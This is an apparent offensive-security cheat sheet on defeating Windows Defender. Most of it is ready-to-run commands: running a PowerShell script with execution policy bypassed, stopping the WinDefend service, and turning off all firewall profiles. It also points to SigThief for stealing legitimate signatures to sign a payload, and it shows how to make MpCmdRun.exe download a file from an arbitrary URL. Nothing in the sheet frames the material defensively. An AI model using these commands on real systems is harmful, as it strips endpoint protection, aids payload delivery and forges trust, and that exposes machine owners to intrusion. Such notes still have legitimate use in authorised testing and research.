Windows Defender

Start/Stop

# Requires admin privileges or being able to run a custom powershell sudo ! (sudo.ps1)
powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Username\AppData\Local\Temp\sudo_PS1-0.ps1; }"

# Stop Windows Defender using cmd.exe
sc stop WinDefend

# Identify firewall profiles for an user
netsh advfirewall show allprofiles

# Disable all firewall profiles for an user
netsh advfirewall set allprofiles state off

# Totally disable the firewall
netsh firewall set opmode disable

Bypass

# SigThief allow to sign a payload binary
# by stealing a legit signature
https://github.com/secretsquirrel/SigThief

Downloading

https://twitter.com/mohammadaskar2/status/1301263551638761477?s=19

# You can download a file using Windows Defender itself
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe -url <url> -path <local-path>